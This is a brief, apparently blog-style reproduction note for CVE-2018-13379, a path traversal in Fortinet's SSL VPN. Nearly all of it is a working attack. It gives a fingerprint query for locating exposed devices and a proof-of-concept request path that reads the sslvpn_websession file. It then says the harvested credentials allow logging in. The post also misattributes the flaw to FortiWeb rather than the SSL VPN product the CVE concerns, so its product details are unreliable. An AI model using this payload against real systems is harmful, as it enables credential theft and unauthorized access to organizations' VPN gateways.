Fortinet Fortiweb Sslvpn_websession Path Traversal Vulnerability Cve 2018 13379
Fortinet Fortiweb Sslvpn_websession Path Traversal Vulnerability Cve 2018 13379
Fortinet FortiWeb sslvpn_websession path traversal vulnerability CVE-2018-13379
Vulnerability Description
Fortinet FortiWeb path traversal vulnerability, attackers can obtain cache information through the vulnerability and log in to the server
Vulnerability Impact
Fortinet FortiWeb
Network surveying and mapping
body=”FortiToken clock drift detected”
Vulnerability reappears
Login page
Verify POC
1
/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
You can log in to the background by obtaining the account password
This post is licensed under CC BY 4.0 by the author.